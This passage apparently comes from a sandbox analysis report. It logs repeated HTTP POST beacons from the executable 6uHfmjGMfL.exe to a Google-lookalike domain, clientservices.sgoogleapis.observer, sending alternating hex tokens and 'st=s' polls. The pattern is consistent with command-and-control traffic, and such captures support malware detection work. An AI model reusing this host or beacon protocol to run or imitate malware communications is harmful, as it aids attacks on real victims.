Jan 8, 2025 08:47:28.312567949 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:47:28.946984053 CET	827	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eGMwhMU9PiE8YWXVkDyumkzCPCUdEiJ1rWe36IRSdqL2%2BD05KbEPfsrCIp9%2Fhvbm1gOrkn4LGd6lowZmEi%2FgA6oiQ0IWuKFzxLFA%2Fjv3ur9xZweGc9A0eoCyC0TfI8KCRQwZq7z%2FeTm5Qd551%2FKQ3OsUID2bqw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea94687d227d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1998&rtt_var=999&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.5	50071	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:30.733923912 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:47:31.371124029 CET	813	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GMwhARAER48ejXd8NqKuCmT%2Bsx0pkLMHw6OqSe9cTw1HZz2NQ8mp8ZHLGrRWlxixqNce7gxmBhwAhHihN6fqhoVFg9%2Bil0jFrWYEuHPlblj2yyARtVJgO4yEb0vbBd0W6xAcCKceiql61N8UgrMh3nBD0I9okg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9477abaa0f36-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1555&min_rtt=1555&rtt_var=777&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	50072	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:32.889921904 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:47:33.532941103 CET	820	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J0zLV93Z6IdKTwymqXzsMlHAo1drKi9yMXPib4TdRCsz6w%2FxlnMONAX2Sh%2FqtaKsItrgkn05I7mEe%2BJ1JOS12RBUjIaVI76%2F6OEIbxtBw8XiySTb6SLBIcpSZnGu9G015sx2xqE2jco6%2FY5f7L7LQOTVaqsIRQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9485189842d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1546&min_rtt=1546&rtt_var=773&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a Data Ascii: 7 <c><d>
Jan 8, 2025 08:47:33.664865971 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.5	50073	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:35.295711040 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:47:35.924393892 CET	819	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yshjAfgPmfBp87iJVsP8rkd%2Fl46sBBEYAbKW7VaPSYqmCslSHKVxPI%2FxK4CqQOAg4eWmvSw6ZH5OuN2gwnuSzz36Gpcd%2Bi7QXX9y8D9z4s%2FacZQJEHT%2BvR3PH3yMk8FmHk0E6UqY3buGtC2hosydQ5OUiqbDPA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea94941dff8c0f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1948&rtt_var=974&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.5	50074	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:37.436069012 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:47:38.069399118 CET	828	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2FL%2BM%2BB4MalFQWbUH6HHcWTUl9pxhvx%2FWsQUi6Ogb7ZFVj4mTJKQV%2FNI5LApPnMZaZs6rXJpVdVXfEPfJgzrcQp%2FZo0Bkq1LNywWygxWcWrOuWbOPD3upAUPjBr%2BtjKSsZNi1g9%2BDf%2FeeCxCvdlNwsD2RdYY2g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea94a179630f36-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1460&min_rtt=1460&rtt_var=730&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a Data Ascii: 7 <c><d>
Jan 8, 2025 08:47:38.199882030 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.5	50075	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:39.826623917 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:47:40.452537060 CET	813	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R7NckOVddOjJIy7UNs34DMP4QR1o4zdipi35FSSmoWj5PXTP1Pk66Z8oG%2BPrBGO6TBj67mVntX4lz1JtczdRTVs61PXEpEOGD%2B5Rcx41j81AvEvCCNpG6bc8YttJVQsLQTCZ9Z8HgOLSKkb96jRVqF8a4ngYvw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea94b0699642d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1573&rtt_var=786&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.5	50076	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:41.967251062 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:47:42.608059883 CET	827	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mMs%2FcdYxKxEExJdsVvmzwKTvhrexwtLRjo3DsmHu4rDHjickCC7W5unnaWKYL1qGoSv5SwzrSuDlUw%2B%2FTLARsb3ZZ5ZqIwPhZcld3%2B%2Bum4EKXXuPfmMJpblj4zOeEdopF0ZaCwzGuuHEaPjJgTbdiy5i%2FKxWwA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea94bdc9f0c443-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1591&rtt_var=795&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.5	50077	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:44.295206070 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:47:44.854605913 CET	831	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PwU10P%2B%2B0r%2Fj9JUNaV%2F%2BcES1anVotmB%2BTHK%2B5inuiAVojVDUx9zMLHb9n9YI9Jt5lUpyxbg1TNWR6xPxTa4NY75l8lw%2BPijzWiVNHwjPIIl8B02E9C7DCCubPr393yeXA%2BWbgsFAApkOSrKb%2Bn242M%2FOuS8JKg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea94cc69077d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1931&min_rtt=1931&rtt_var=965&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.5	50078	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:46.376808882 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:47:47.007442951 CET	827	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gLFIhhOHsvknjhDGs9qEJYYGGsR0F2oJ1owdGTa5%2F2ydhq8%2Bzn79OkGK87ehY%2FPCe4R5lo1hpP7N8cJW6NFSA%2B3NXZEHopNIZXlkxLWQ%2BiPYZYqbqfxTejCYRAjFVo%2BXBC804HV6C0jkQoqsbTfjpZlGoNyqhQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea94d958a842d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1558&rtt_var=779&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.5	50079	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:48.748728991 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:47:49.371973038 CET	815	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u1DSEjvsIyYxD1%2FapoHRaVnnx%2FxN6UcT2frrelV7VhWunHAcfCDcoX548UQr29oq8WDiUDYDNwpLi82lQxvK7%2ByJpujEhdrW49wlNoMxkSbPyT02CZhuHAgc4LN5YvROBXtj6J6eUpaBI5LeP6Uk6A8zsKsasg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea94e829f70f36-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1449&min_rtt=1449&rtt_var=724&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.5	50080	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:50.890877008 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:47:51.539683104 CET	821	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F5MiEvWVvtR6BDYxQ8uAxelTR%2B0I4WGgjvPoAQawGMFBxZbv4gh9SbxztC9XXHwuHFa0VAZ66dVEv4AOKdztcdSFzSxeQrz19U9cL8fnK8H11qv0ABv6i1zt1SeR17ktt0VY6tH5BMgvFt0ep%2FCNURxCWIlazA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea94f5aa4842d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1554&rtt_var=777&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.5	50081	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:53.249902964 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:47:53.871049881 CET	817	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Map50QzQZ2WfEw9uxBxmLWWcC%2BbGawYB83Cjvy%2FXFBLktXYA1wTtJVkXR0Wx%2BjkU5HB40sjgAVP4cdgXvMe23yfBHPAFeVi8lbbWCR%2BjXNF74YX08mlpCoQ5XE6dmJogVHAYmERp5howNLcHYeBA41lupFs8GA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea95044c817d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1923&min_rtt=1923&rtt_var=961&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.5	50082	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:55.391611099 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:47:56.047641039 CET	821	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w1Nizr5UZ%2FArnR1xEhYVnLurbwghp9EnJxwzwVx586MCXOUpEtIlGIJOVhuLqz90Lyh1l64KR2ztHPGir50o19Zi%2BIYHxyKIsHs3sLFsjk1dnzXMifJCy9uAPLu%2FpSw0K5ihPz3UV70wCMEYWTUB5iUs1kif4w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9511cf5b0f36-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1472&min_rtt=1472&rtt_var=736&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.5	50083	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:57.685775042 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:47:58.309581041 CET	817	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WnK4uQd4uqH1PFye64yfoVQ98PHEZ0UvfeHyTZMSXmgU2t4a3UXPnPYsE6QIu4BdLkmSPe0%2FvrU8F6YwMOyzb7ZsACnfU3hg11n1T1od7cX%2BtjrM%2FdPp6nGd5%2BIMHtqeJAMzg6gcnpH6YC6b2kUdNhCXFrAdZw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea95200ea47d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1925&min_rtt=1925&rtt_var=962&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.5	50084	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
